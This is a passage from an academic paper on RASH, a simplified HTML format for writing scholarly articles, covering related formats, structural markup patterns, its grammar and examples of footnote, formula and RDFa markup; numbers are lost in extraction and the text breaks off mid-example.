articles, and leaves all the issues about validation, visualisation, conversion, and semantic data extraction to the various tools developed within its framework. how to cite this article peroni et al. ( ), research articles in simplified html: a web-first format for html-based scholarly arti- cles. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:silvio.peroni@unibo.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. 
subjects digital libraries, world wide web and web science keywords document conversion, xslt, rash, semantic publishing, digital publishing, semantic web introduction in the last months of , several posts within technical mailing lists of the web (https://lists.w .org/archives/public/public-lod/ nov/ .html) and semantic web (https://lists.w .org/archives/public/public-lod/ oct/ .html) community have discussedan evergreentopic inscholarly communication, i.e.,how couldauthorsof research papers submit their works in html rather than, say, pdf, ms word or latex. besides the obvious justification of simplification and unification of data formats for drafting, submission and publication, an additional underlying rationale is that the adoption of html would ease the embedding of semantic annotations, thus improving research communications thanks to already existing w c standards such as rdfa (sporny, ), turtle (prud’hommeaux & carothers, ) and json-ld (sporny, kellogg & lanthaler, ). this opens complex and exciting scenarios that the semantic publishing community has promised us in terms of increased discoverability, interactivity, openness and usability of the scientific works (bourne et al., ; shotton et al., ). nonetheless, html is still primarily used as an output format only: the authors write their papers in latex or ms word and submit sources to the typesetters, who are responsible for producing the final version, that eventually will be published and read on the web. appropriate tools in the publishing toolchain are used to convert papers among multiple formats. the interest in web-first research papers—that are natively designed, stored and transferred in html—is increasing. just to cite a few research efforts: scholarly html (http://scholarlyhtml.org) defines a set of descriptive rules for adopting a defined subset of html to describe the metadata and content of scholarly articles; dokieli (http://dokie.li) is a web application that allows authors to create html-based scholarly articles directly on the browser, adding annotations and many other sophisticated features. this paper introduces a novel approach towards the same goal: providing authors with a subset of html for web-first papers. the format is called rash, research articles in sim- plified html, and consists of html elements only. this format is also accompanied by the rash framework, a set of specifications and tools for rash documents (peroni, ). there are two key differences between rash and other similar proposals. first of all, rash adopts a simplified pattern-based data model. the number of markup elements to be used by authors was reduced down to the bare minimum, and the elements themselves were chosen in order to minimize the cognitive effort of authors when writing documents. secondly, rash does not come with a full authoring environment but is expected to be produced from ms word, odt and latex sources. the basic idea is to allow authors to keep using the word processors on which they routinely write their papers and to peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://lists.w .org/archives/public/public-lod/ nov/ .html https://lists.w .org/archives/public/public-lod/ oct/ .html http://scholarlyhtml.org http://dokie.li http://dx.doi.org/ . /peerj-cs. provide them with multi-format converters. these converters are included in the rash framework, whose architecture is modular and extensible for handling new formats in the future. 
rash is in fact intended to help authors in focussing on the organisation of their texts and supports them in the task of semantically enriching the content of articles, delegating all the issues about validation/presentation/conversion of rash documents to the various tools developed within its framework. this is a well-known principle in scientific publishing, even if not yet fully applied: clear separation of concerns. the authors should focus on organising the content and structure only, and the format should not require authors to worry about how the content will be presented on screen and in print. the publishers will then take care of creating the final formatting to best render the content in the style of their publications, or authors could use self-publishing platforms as promoted by linked research (http://linkedresearch.org). such a separation of concerns can be pushed much forward. pettifer et al. ( ) explained well the difference between an article as ‘‘an instance of scholarly thought’’ and ‘‘a representation for consumption by human or machine’’, and showed how multiple representations can be combined, integrated with external data, enhanced and interacted with in order to provide scholars with sophisticated tools directly within their articles. another critical requirement for any html-based language used for scientific writing is good rendering and acceptance by the publishers. any new html-based format should be beneficial for publishers as well. of course, publishers, conferences, and workshop organisers, would like to manage new formats in the same way as for the formats they already support, such as latex. to this end, these formats should support tools for their conversion and for rendering the content in specific layouts, such as acm icps (http://www.acm.org/sigs/publications/proceedings-templates) and springer lncs (http://www.springer.com/computer/lncs?sgwid= - - - - ). rash adopts a pragmatic approach to this issue: while we are interested in a full-fledged native rash authoring environment, we implemented a set of converters, in the rash framework, that are easily integrable (and were integrated) with existing publishing platforms. the goal of this paper is, in fact, to describe the outcomes of some experimentations on the use of rash, so as to understand: . if it can be adopted as html-based submission format in academic venues (workshops, conferences, journals); . if it is easy to learn and use; . if it can be used to add semantic annotations and what are the most widely adopted vocabularies in rash papers. the rest of the paper is structured as follows. in ‘related works’ we introduce some of the most relevant related works in the area, providing a functional comparison of the various works. in ‘which ‘‘web-first’’ format for research articles?’ we introduce the rationale for the creation of a new web-first format for scholarly publications, discussing the importance of minimality. in ‘writing scholarly articles in html with rash’ and ‘the rash framework’ we introduce the theoretical background of rash, and then provide an introduction to the language and the main tools included in its framework. in ‘rash peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://linkedresearch.org http://www.acm.org/sigs/publications/proceedings-templates http://www.springer.com/computer/lncs?sgwid= - - - - http://dx.doi.org/ . /peerj-cs. 
and save-sd: an evaluation’ we present, as a case study, an analysis of the adoption of rash at the save-sd (http://cs.unibo.it/save-sd/ /index.html) and save-sd (http://cs.unibo.it/save-sd/ /index.html) workshops. finally, in ‘conclusions’ we conclude the paper by sketching out some future developments. related works the growing interest in the publication of web-first research papers has resulted in the release of some interesting projects related to rash. in the following subsections, we discuss all the most important contributions in this area by splitting them into two main categories: (i) html-based formats and (ii) wysiwyg editors for html documents. note that we do not discuss in detail some other efforts that have recently been done by means of non-html languages, even if they are equally relevant for the community. scholarlymarkdown (http://scholarlymarkdown.com/) (lin & beales, ), for instance, is a syntax to produce scholarly articles according to a markdown (http://daringfireball.net/ projects/markdown/) input. sharelatex (https://www.sharelatex.com/) is a web-based real-time collaborative editor for latex documents. in table we briefly summarise the features and capabilities of the formats presented, in order to highlight the main differences between them. html-based formats one of the first documented contributions that proposed an html-based format for scholarly articles was scholarly html (http://scholarlyhtml.org). it is not defined as a formal grammar, but as a set of descriptive rules which allows one to specify just a reduced amount of html tags for describing the metadata and content of a scholarly article. it is the main intermediate format used in contentmine (http://contentmine.org) for describing the conversion of pdf content into html. along the same lines, pubcss (https://github.com/thomaspark/pubcss/) is a project which aims at pushing the use of html+css for writing scholarly articles. it does not define a formal grammar for the html element set to use. rather it provides some html templates according to four different css styles, which mimic four latex styles for computer science articles, i.e., acm sig proceedings, acm sigchi proceedings, acm sigchi extended abstracts, and ieee conference proceedings. htmlbooks (https://github.com/oreillymedia/htmlbook/) is an o’reilly’s specification for creating html documents (books, in particular) by using a subset of all the (x)html elements. this is one of the first public works by a publisher for pushing html-like publications, even if the status of its documentation (and, consequently, of its schema) is still ‘‘unofficial’’. another project, which shares the same name of one of the previous ones, scholarly html (https://github.com/scienceai/scholarly.vernacular.io), is a work by the science.ai (http://science.ai) company that aims at providing a domain-specific data format based on open standards (among which html ) for enabling ‘‘the interoperable exchange of scholarly articles in a manner that is compatible with off-the-shelf browsers’’ (berjon & ballesteros, ). while the format is not defined by any particular formal grammar, it has peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://cs.unibo.it/save-sd/ /index.html http://cs.unibo.it/save-sd/ /index.html http://scholarlymarkdown.com/ http://daringfireball.net/projects/markdown/ http://daringfireball.net/projects/markdown/ https://www.sharelatex.com/ http://scholarlyhtml.org http://contentmine.org https://github.com/thomaspark/pubcss/ https://github.com/oreillymedia/htmlbook/ https://github.com/scienceai/scholarly.vernacular.io http://science.ai http://dx.doi.org/ . /peerj-cs. table a comparison among existing html-oriented formats for scholarly papers according to seven distinct categories. format syntax doc formal grammar semantic annotations css for different formats wysiwyg editor conversion from conversion to rasha html available onlineb relaxngc rdfa, rdf/xml, turtle, json-ld web-based and springer lncs apache openoffice, mi- crosoft word, rash javascript editor (raje) odt, docx latex: acm icps, acm journal large, peerj cs, springer lncs scholarly html ( )d html available online e none rdfa none none pdf (via contentmine— normaf) none pubcssg html available onlineh informal (via html templates) none acm sig proceedings, acm sigchi proceedings, acm sigchi extended abstracts, and ieee confer- ence proceedings none none pdf (via browser interface) html booksi html available onlinej xml schemak none css files for pdf print- ing and epub/mobi- compatible device visualisa- tions none none none scholarly html ( )l html available onlinem none rdfa, json-ld web-based microsoft word (as refer- enced onlinen and their on- line platform (no access for free guaranted as of june ) docx none scholarly html ( )o html available onlinep none rdfa, json-ld web-based none none none dokieli format html available onlineq informal (via html templates and patterns) rdfa, turtle, json-ld, trig web-based (native and ba- sic), springer lncs, acm icps dokielir none pdf (via browser interface) (continued on next page) p eronietal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) format syntax doc formal grammar semantic annotations css for different formats wysiwyg editor conversion from conversion to fiduswriter format html none none none web-based fiduswriters none html, epub, latex authorea format html none none none web-based authorea t docx, latex docx, latex (accord- ing to several stylesheets), pdf, zipped structure with html notes. ahttps://github.com/essepuntato/rash/. bhttp://cs.unibo.it/save-sd/rash. chttps://raw.githubusercontent.com/essepuntato/rash/master/grammar/rash.rng. dhttp://scholarlyhtml.org/. ehttp://scholarlyhtml.org/core-specification/. fhttps://github.com/contentmine/norma. ghttps://github.com/thomaspark/pubcss/. hhttp://thomaspark.co/ / /pubcss-formatting-academic-publications-in-html-css/. ihttps://github.com/oreillymedia/htmlbook/. jhttp://oreillymedia.github.io/htmlbook/. khttps://raw.githubusercontent.com/oreillymedia/htmlbook/master/schema/htmlbook.xsd. lhttps://github.com/scienceai/scholarly.vernacular.io. mhttp://scholarly.vernacular.io/. nhttps://science.ai/overview. ohttps://github.com/w c/scholarly-html. phttps://w c.github.io/scholarly-html/. qhttps://dokie.li/docs. rhttp://dokie.li. shttps://www.fiduswriter.org. thttps://www.authorea.com. p eronietal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. 
/ https://peerj.com https://github.com/essepuntato/rash/ http://cs.unibo.it/save-sd/rash https://raw.githubusercontent.com/essepuntato/rash/master/grammar/rash.rng http://scholarlyhtml.org/ http://scholarlyhtml.org/core-specification/ https://github.com/contentmine/norma https://github.com/thomaspark/pubcss/ http://thomaspark.co/ / /pubcss-formatting-academic-publications-in-html-css/ https://github.com/oreillymedia/htmlbook/ http://oreillymedia.github.io/htmlbook/ https://raw.githubusercontent.com/oreillymedia/htmlbook/master/schema/htmlbook.xsd https://github.com/scienceai/scholarly.vernacular.io http://scholarly.vernacular.io/ https://science.ai/overview https://github.com/w c/scholarly-html https://w c.github.io/scholarly-html/ https://dokie.li/docs http://dokie.li https://www.fiduswriter.org https://www.authorea.com http://dx.doi.org/ . /peerj-cs. the main aim of the linkedresearch project is to propose principles for enabling researchers to share and reuse research knowledge by means of existing web and semantic web technologies towards a future world where researchers can publish and consume human-friendly and machine-readable (e.g., by using rdfa (sporny, )) scholarly documents. a well-described documentation (berjon & ballesteros, ) that teaches how to produce scholarly documents by using a quite large set of html tags, accompanied by schema.org (http://schema.org) annotations for describing specific structural roles of documents as well as basic metadata of the paper. the company also provides services that enable the conversion from microsoft word document into scholarlyhtml format. one of the authors of the previous work is also the chair of a w c community group called ‘‘scholarly html’’ (https://www.w .org/community/scholarlyhtml/) which aims at developing a html vernacular (https://github.com/w c/scholarly-html) for the creation of a web-first format for scholarly articles. it involves several people from all the aforementioned specifications (including rash), and the group work should result in the release of a community-proposed interchange html format. as of september , , the online documentation (https://w c.github.io/scholarly-html/) is mainly a fork of the scholarly html specification proposed by science.ai discussed above. html-oriented wysiwyg editors one of the most important and recent proposals, which is compliant with the principles introduced as part of the linked research (http://linkedresearch.org) project , is dokieli (https://dokie.li) (capadisli et al., ). dokieli is a web application (still under development) that allows the creation of html-based scholarly articles directly on the browser, and implements several features among which are annotations (in rdf) and a notification system. the application makes also available some html templates and a series of widgets for navigating, visualising (in different formats) and printing research documents easily by using common browsers. fidus writer (https://www.fiduswriter.org/) is another web-based application for creating html scholarly documents by means of a wordprocessor-like interface. while the particular format used is not explicitly specified, it allows the conversion of the html documents created within the application in two different formats, i.e., epub and latex (alongside with html). authorea (https://www.authorea.com) is a web service that allows users to write papers by means of a clear and effective interface. 
it enables the inclusion of the main components of scientific papers such as inline elements (emphasis, quotations, etc.), complex structures (figures, equations, etc.), and allows the use of markdown and latex for adding more sophisticated constructs. in addition, authorea is able to export the document in four different formats (pdf, latex, docx, and zipped archive with several html files) and according to a large number of stylesheets used in academic venues. which “web-first” format for research articles? the term ‘‘web-first’’ format indicates the possibility of using html as a primary format to write, store and transfer research articles, and not only to make these articles available on the web. some questions naturally arise in this context: shall we use the full html? if we impose a limited subset, which elements should we consider? shall we demand specific rules for using the language? peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://schema.org https://www.w .org/community/scholarlyhtml/ https://github.com/w c/scholarly-html https://w c.github.io/scholarly-html/ http://linkedresearch.org https://dokie.li https://www.fiduswriter.org/ https://www.authorea.com http://dx.doi.org/ . /peerj-cs. note that accepting html as format for submissions in conferences/workshops is a totally different issue, since this choice is normally taken by the organisers. for instance, see the save-sd call for papers (http://cs.unibo.it/save- sd/ /submission.html) and the various editions of sepublica (http://ceur- ws.org/vol- /). some works, e.g., capadisli, riedl & auer ( ), suggest not to force any particular html structure for research papers. this choice would allow authors to use whatever html structure they want for writing papers and would reduce (even, eliminate) the fear for the template bottleneck, i.e., the fact that users may not adopt a particular language if they are compelled to follow specific rules. on the other hand, leaving to the authors the freedom of using, potentially, the whole html specification may affect, in some way, the whole writing and publishing process of articles. the author could adopt any kind of html linearisation, e.g., using elements div instead of elements section, using elements table for their presentational behaviour (i.e., how they are rendered by browsers or other software readers) and not for presenting tabular data, and the like. this freedom could result in two main kinds of issues: • visualisation bottleneck—it may affect the correct use of existing, well-developed and pretty standard csss (e.g., capadisli’s csss developed for dokieli (https://dokie.li)) for both screen and print media, in having to write new codes for handling paper visualisation correctly; • less focus on the research content—the fact that a certain paper is not visualised in a browser very well (or, worse, in a way that is not the one the author expects) could bring the author to work on the presentation of the text, rather than on focussing on the actual research content of the text. another point against the use of any html syntax for writing papers concerns the possibility of enabling an easy way for sharing the paper with others (e.g., co-authors) who, potentially, may not use html in the same way. if all the co-authors of a paper are able to use the full html, they may not understand other users’ specific use of some html tags —‘‘why did they use the elements section instead of div?’’; ‘‘what is this freaky use of elements table?’’. 
hence, the advantages of using a common html format is quite evident: only one syntax and only one possible semantics. there is a further issue worth mentioning. having a shared, unambiguous and simple format would facilitate conversions from/into other complex ones (e.g., odt (jtc /sc wg , ), ooxml (jtc /sc wg , ), docbook (walsh, ), jats (national information standards organization, ), thus enabling authors to use their own text editors or word-processors to modify the articles. the conversion is instead much more complex, error-prone and imprecise on the full html. to complicate an already complex scenario there is the necessary involvement of publishers. allowing the authorsto use their ownhtml format couldbe counterproductive from a publisher’s perspective, in particular when we speak about the possibility of adopting such html formats for regular conference/journal camera-ready submissions. from a recent discussion on the force mailing list (https://groups.google.com/forum/#!topic/ forcnet/g bnaoomjmm), it emerges that publishers are willing to adopt html for submissions if and only if it is a clear community need. it means that they will include html formats in the publishing workflow only once a number of conference organisers decides to include html among the accepted formats for paper submissions . however, using one clear web-first format, rather than a plethora of possible variations allowed by peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://cs.unibo.it/save-sd/ /submission.html http://cs.unibo.it/save-sd/ /submission.html http://ceur-ws.org/vol- / http://ceur-ws.org/vol- / https://peerj.com https://dokie.li https://groups.google.com/forum/#!topic/forcnet/g bnaoomjmm https://groups.google.com/forum/#!topic/forcnet/g bnaoomjmm http://dx.doi.org/ . /peerj-cs. oasis legaldocumentml is the standardisation of akomantoso (http: //www.akomantoso.org/), which is a set of simple technology-neutral electronic representations in xml format of parliamentary, legislative and judiciary documents, and has been already adopted by several parliaments in european union, africa, and south america. the full html schema, would certainly lighten the burden of publishers for including html within their publishing workflow. this inclusion could be additionally favoured by the availability of services (e.g., editors, converters, enhancers, visualisers) for facilitating the use of such a web-first format within the existing publishing environments. last but not least, using a controlled subset of html is more appropriate for semantic publishing applications (shotton et al., ; peroni, b). the development of scripts and applications to extract, for instance, rdf statements directly from the markup structure of the text is a sort of nightmare if different authors use html in different manners. for instance, what happens when trying to extract the rhetorical organisation of a scientific paper according to the document component ontology (doco) (http://purl.org/spar/doco) (constantin et al., ) from two html documents that use html tags in different ways? is an html element table an actual table (containing tabular data)? which are the tags identifying sections? these analyses are all easier within a controlled and unambiguous subset of html. writing scholarly articles in html with rash the subset of html we propose in rash is strictly compliant to a patterns theory we have developed over the past few years. patterns are widely accepted solutions to handle recurring problems. 
firstly introduced for architecture and engineering problems (alexander, ), they have been successfully deployed in computer science and in particular in software engineering (gamma et al., ). in this section, we briefly introduce our patterns for document engineering and then we go into the details of rash. theoretical foundations: structural patterns while we have plenty of tools and languages for creating new markup languages (e.g., relaxng (clark & makoto, ) and xmlschema gao, sperberg-mcqueen & thompson, ), these usually do not provide any particular guideline for fostering the development of robust and well-shaped document languages. in order to fill that gap, in the last decade we have experimented with the use of a theory of structural patterns for markup documents (di iorio et al., ), that has since been applied in several national and international standards, among which oasis legaldocumentml (https://www.oasis-open.org/committees/legaldocml/) , a legal document standard for the specification of parliamentary, legislative and judicial documents, and for their interchange between institutions in different countries. the basic idea behind this theory is that each element of a markup language should comply with one and only one structural pattern, depending on the fact that the element: • can or cannot contain text (+t in the first case, −t otherwise); • can or cannot contain other elements (+s in the first case, −s otherwise); • is contained by another element that can or cannot contain text (+t in the first case, −t otherwise). peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.akomantoso.org/ http://www.akomantoso.org/ https://peerj.com http://purl.org/spar/doco https://www.oasis-open.org/committees/legaldocml/ http://dx.doi.org/ . /peerj-cs. by combining all these possible values—i.e.,±t,±s, and±t—we basically obtain eight core structural patterns, namely (accompanied by a plausible example within the html elements): . inline [+t+s+t], e.g., the element em; . block [+t+s−t], e.g., the element p; . popup [−t+s+t], e.g., the element aside; . container [−t+s−t], e.g., the element section; . atom [+t−s+t], e.g., the element abbr; . field [+t−s−t], e.g., the element title; . milestone [−t−s+t], e.g., the element img; . meta [−t−s−t], e.g., the element link. instead of defining a large number of complex and diversified structures, the idea is that a small number of structural patterns are sufficient to express what most users need for defining the organisation of their documents. therefore, the two main aspects related to such patterns are: • orthogonality—each pattern has a specific goal and fits a specific context. it makes it possible to associate a single pattern to each of the most common situations in document design. conversely, for every situation encountered in the creation of a new markup language, the corresponding pattern is immediately selectable and applicable; • assemblability—each pattern can be used only in some contexts within other patterns. this strictness provides expressiveness and non-ambiguity in the patterns. by limiting the possible choices, patterns prevent the creation of uncontrolled and misleading content structures. such patterns allow authors to create unambiguous, manageable and well-structured markup languages and, consequently, documents, fostering increased reusability (e.g., inclusion, conversion, etc.) among different languages. 
also, thanks to the regularity they provide, it is possible to perform easily complex operations on pattern-based documents even when knowing very little about their vocabulary (automatic visualisation of document, inferences on the document structure, etc.). in this way, designers can implement more reliable and efficient tools, can make a hypothesis regarding the meanings of the document fragments, can identify singularities and can study the global properties of a set of documents, as described in di iorio et al. ( ) and di iorio et al. ( ). html does not use the aforementioned patterns in a systematic way, as it allows the creation of arbitrary and, sometimes, quite ambiguous structures. to apply the structural pattern guidelines for rash, we restricted html by selecting a good subset of elements expressive enough to capture the typical components of a scholarly article while being also well-designed, easy to reuse and robust. rash: research article in simplified html the research articles in simplified html (rash) format is a markup language that restricts the use of html (http://www.w .org/tr/html /) elements to only elements for writing academic research articles. it allows authors to use embedded rdf annotations. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.w .org/tr/html / http://dx.doi.org/ . /peerj-cs. please refer to the official rash documentation, available at https: //rawgit.com/essepuntato/rash/master/ documentation/index.html, for a complete introduction of all the elements and attributes that can be used in rash documents. the following prefixes are always mandatory in any rash document: •schema: http://schema.org/ •prism: http://prismstandard.org/ namespaces/basic/ . /. in addition, rash strictly follows the digital publishing wai-aria module . (garrish et al., ) for expressing structural semantics on various markup elements used. all rash documents begin as a simple html document (hickson et al., ), by specifying the generic html doctype followed by the document element html with the usual namespace (‘‘http://www.w .org/ /xhtml’’) and with additional (and mandatory) prefix declarations through the attribute prefix . the element html contains the element head for defining metadata of the document according to the dcterms (http: //dublincore.org/documents/dcmi-terms/) and prism (http://www.prismstandard.org/) standards and the element body for including the whole content of the document. the element head of a rash document must include some information about the paper, i.e., the paper title (element title), at least one author, while other related information (i.e., affiliations, keywords and categories included using the elements meta and link) are optional. the element body mainly contains textual elements (e.g., paragraphs, emphases, links, and quotations) for describing the content of the paper, and other structural elements (e.g., abstract, sections, references, and footnotes) used to organise the paper in appropriate blocks and to present specific complex structures (e.g., figures, formulas, and tables). in the following subsection, we provide a quick discussion about usage patterns in rash, and introduce the tools used for developing its grammar. 
development and patterns the development of rash started from the whole html grammar, and proceeded by removing and restricting the particular use of html elements, to make them expressive enough for representing the structures of scholarly papers and to have the language totally compliant with the theory on structural patterns for xml documents (di iorio et al., ) introduced in ‘theoretical foundations: structural patterns’. the systematic use of these structural patterns is an added value in all stages of the documents’ lifecycle: they can be guidelines for creating well-engineered documents and vocabularies, rules to extract structural components from legacy documents, indicators to study to what extent documents share design principles and community guidelines. all these characteristics have allowed us to simplify, at least to some extent, the handling of all the requirements introduced in ‘introduction’ and ‘which ‘‘web-first’’ format for research articles?’ in rash. table shows what is the current pattern assignment for each element in rash. notice that we do not use two patterns presented in ‘theoretical foundations: structural patterns’, namely atom and popup. the elements compliant with the former pattern are contained in discursive blocks (e.g., paragraphs) and contain only textual content with no additional elements. this is very infrequent in scholarly writings since any element used for emphases, links, and other in-sentence elements can always contain additional elements (e.g., an emphasis can contain a link). a different discourse can be done for the pattern popup, which is meant to represent complex substructures that interrupt but do not break the main flow of the text, such as footnotes (di iorio et al., ). an element compliant to the popup pattern, while still not allowing directly text content inside itself, is found in elements with a mixed context peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://rawgit.com/essepuntato/rash/master/documentation/index.html https://rawgit.com/essepuntato/rash/master/documentation/index.html https://rawgit.com/essepuntato/rash/master/documentation/index.html http://schema.org/ http://prismstandard.org/namespaces/basic/ . / http://prismstandard.org/namespaces/basic/ . / https://peerj.com http://www.w .org/ /xhtml http://dublincore.org/documents/dcmi-terms/ http://dublincore.org/documents/dcmi-terms/ http://www.prismstandard.org/ http://dx.doi.org/ . /peerj-cs. table the use of structural patterns in rash. pattern rash element inline a, code, em, math, q, span, strong, sub, sup, svg block figcaption, h , p, pre, th popup none container blockquote, body, figure, head, html, li, ol, section, table, td, tr, ul atom none field script, title milestone img meta link, meta [t+s+]. in particular, in developing rash, we discussed which of the following two possible approaches for defining footnotes was more adequate to our needs. the first option was a container-based behaviour, also suggested by jats (national information standards organization, ) by means of the element fn-group and not included in html specifications, that allows the authors to specify footnotes (through the element ft) by using a tag that is totally separated from the main text from which it is referenced (usually through xml attributes), as shown in the following excerpt: <-- a paragraph referring to a footnote --> <p> in this paragraph there is an explicit reference to the second footnote <xref rid="n "></xref >. 
</p> <-- the group containing all the footnotes --> <fn-group > <fn id="n "> <p>this is a paragraph within a footnote.</p> </fn> <fn id="n "> <p>this is a paragraph in another footnote.</p> <p> all the footnotes are contained in a group , so as to collect them together. </p> </fn> ... </fn-group > the alternative was a popup-based behaviour, used by default in latex (through the marker \footnote{}) and even possible in jats (which is a very permissive language by design), where a paragraph can be abruptly interrupted by one or more paragraphs specified in a footnote, as shown in the following excerpt: <-- a paragraph containing a footnote --> <p> in this paragraph the footnote <fn id="n "><p>that is what we call popup -based behaviour !.</p></fn> has been defined directly within it. </p> we considered the latter approach a bit confusing, since it actually decreases the readability of the html source where footnotes are needed. we thus decided to adopt a solution similar to the jats fn-group element, extending the html section element with @role set to doc-endnotes and doc-endnote: peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the content model of an element is the particular organisation of its content in terms of text, attributes and elements that it can contain. <-- a paragraph referring to a footnote --> <p> in this paragraph there is an explicit reference to the second footnote <a href ="# fn "></a>. </p> <-- the group containing all the footnotes --> <section role="doc -endnotes"> <section role="doc -endnote" id="fn "> <p>this is the text of a footnote.</p> </section > <section role="doc -endnote" id="fn "> <p>this is the text of another footnote.</p> </section > ... </section > grammar and peculiarities the formal grammar of rash (https://raw.githubusercontent.com/essepuntato/rash/ ef c f ea fb f e d eda /grammar/rash.rng) (current version: . . ) has been developed by means of relaxng (clark & makoto, ), which is a simple, easy to learn, and powerful schema language for xml. the grammar has been logically organised in four distinct logical blocks of syntactic rules, defining respectively elements, attributes, content models for the elements and their related attribute lists, as summarised in the following excerpt: ... <define name="p"> <element name="p"> <ref name=" attributes_html_element_no_role" /> <ref name=" cm_inline" /> </element > </define > ... <define name=" aclass"> <attribute name="class"> <data type=" nmtokens" /> </attribute > </define > ... <define name=" cm_inline"> <zeroormore > <choice > <text /> <ref name="a" /> <ref name="aref" /> <ref name="img" /> <ref name="svg" /> <ref name="math" /> <ref name=" img_math" /> <ref name=" span_latex" /> <ref name="span" /> <ref name="code" /> <ref name="sub" /> <ref name="sup" /> <ref name="em" /> <ref name=" strong" /> <ref name="q" /> </choice > </zeroormore > </define > ... <define name=" attributes_html_element_no_role"> <ref name=" attributes_html_generic" /> <optional > <ref name=" aclass" /> </optional > <ref name=" attributes_rdfa" /> </define > ... peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://raw.githubusercontent.com/essepuntato/rash/ ef c f ea fb f e d eda /grammar/rash.rng https://raw.githubusercontent.com/essepuntato/rash/ ef c f ea fb f e d eda /grammar/rash.rng http://dx.doi.org/ . /peerj-cs. 
in the paper, for the sake of clarity, we use the prefix ''@'' when we name attributes (e.g., the attribute named ''role'' is introduced as @role), while we refer to elements simply by their name (e.g., section).

starting from the latest versions of the language, there has been a clear shift towards an extended use of html semantic elements, despite the fact that they are not backwards compatible with their more generic alternatives in html (raggett, le hors & jacobs, ). in particular, the elements section, figure, and figcaption have been adopted so as to clearly refer to paper sections and to boxes with tables, figures, listings and formulas accompanied by a particular caption. while this choice has fostered the readability of the source, the use of these html elements was not enough to provide proper semantics and accessibility to the rash source. thus, in order to improve the user experience in terms of accessibility of such html-based papers, rash reuses some items from the w c accessible rich internet applications specification (diggs et al., ), and also exploits several roles introduced in the digital publishing wai-aria module (garrish et al., ), which allows ''digital publishers to apply the structural semantics they need to drive the authoring process while getting free accessibility'' (https://lists.w .org/archives/public/public-dpub-aria/ feb/ .html). the use of such semantics is implemented by means of the attribute @role, which can be used on certain rash elements, e.g., sections, and is very useful for specifying clear structural semantics where they are not formally defined. for instance, all the references are organised in a list within a special section defined by using the element section with the attribute @role set to ''doc-bibliography''. this special section contains one list with a bibliographic reference for each list item (i.e., the element li accompanied by the attribute @id, for referencing it within the text, and the attribute @role set to ''doc-biblioentry''), as shown in the following excerpt:

<section role="doc-bibliography">
  <h >references</h >
  <ol>
    <li id="per " role="doc-biblioentry">
      <p>write here the reference entry.</p>
    </li>
    ...
  </ol>
</section>

formulas require special consideration, since there are different ways to implement them. the standard specification for representing mathematics on the web is mathml (carlisle, ion & miner, ). even if mathml is the most accessible way for writing mathematical formulas, the organisation of the elements for defining even a simple formula is quite verbose, and this is a reasonable obstacle to its direct adoption, as shown in the following excerpt describing the formula πr :

<math xmlns="http://www.w .org/ /math/mathml">
  <mi>π</mi>
  <mo><!-- &invisibletimes; --></mo>
  <msup>
    <mi>r</mi>
    <mn > </mn>
  </msup>
</math>

to help the creators of rash documents in dealing with formulas, rash adds two other ways for writing formulas in addition to mathml. the first one is to use an image (element img), which is a very simple way to include maths in a paper. on the other hand, it is not accessible at all, since the various elements of the formula are not marked up properly so as to distinguish them.
another option is to use latex (or, alternatively, asciimath: http://asciimath.org), which is one of the most common ways to write formulas in many scientific papers. both options are specifiable in rash by using either the element img or the element span respectively, accompanied by the attribute @role set to ‘‘math’’, as shown in the following excerpt: <-- specifying a formula through the element 'img ' --> <img role="math" src=" formula.png" alt="r^ " /> <-- specifying a formula in latex through the element 'span ' --> <span role="math">\pi r^ </span > the rendering of any latex or asciimath formula and the multi-browser support for mathml is implemented by using mathjax (https://www.mathjax.org/), which is a javascript display engine for mathematics that works in most modern browsers. of course, it is necessary to explicitly import mathjax in the element head if any rendering of formulas is actually needed, as shown in the following: <!-- mathjax for multi -browser support of latex formulas and mathml --> <script src="https :// cdnjs.cloudflare.com/ajax/libs/mathjax / . . / mathjax.js?config=tex -ams - mml_htmlormml"> </script > rash has been developed in order to allow anyone to add rdfa annotations (sporny, ) to any element of the document. for instance, this paragraph contains the following rdf statement (in turtle (prud’hommeaux & carothers, )): @prefix cito: <http :// purl.org/spar/cito/> . <> cito:credits <http ://www.w .org/tr/rdfa -syntax/> . that was implemented by using specific rdfa attributes (@property and @resource, in this case) within the paragraph content, while the prefixes were defined in the element html, as shown in the following excerpt: <html prefix ="cito: http :// purl.org/spar/cito/"> ... <p> rash has been developed in order to allow anyone to add <span property ="cito:credits" resource ="http ://www.w .org/tr/rdfa -syntax/">rdfa </span > annotations <a href ="# rdfa"></a> to any element of the document. </p> ... </html > in addition to rdfa, rash makes available another way to inject rdf statements (cyganiak, wood & lanthaler, ) to the document, by means of an element script (within the element head): • with the attribute type set to ‘‘text/turtle’’ for adding plain turtle content (prud’hommeaux & carothers, ); • with the attribute type set to ‘‘application/ld+json’’ for adding plain json-ld content (sporny, kellogg & lanthaler, ); • with the attribute type set to ‘‘application/rdf+xml’’ for adding plain rdf/xml content (gandon & schreiber, ). an example of the use of the script for turtle and json-ld statements is shown in the following excerpt: peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://asciimath.org https://www.mathjax.org/ http://dx.doi.org/ . /peerj-cs. <script type="text/turtle"> @prefix pro: <http :// purl.org/spar/pro/> . @prefix foaf: <http :// xmlns.com/foaf / . /& gt; . @prefix sd: <https :// w id.org/scholarlydata/person /> . sd:silvio -peroni a foaf:person ; foaf:givenname "silvio" ; foaf:familyname "peroni" ; foaf:homepage <http 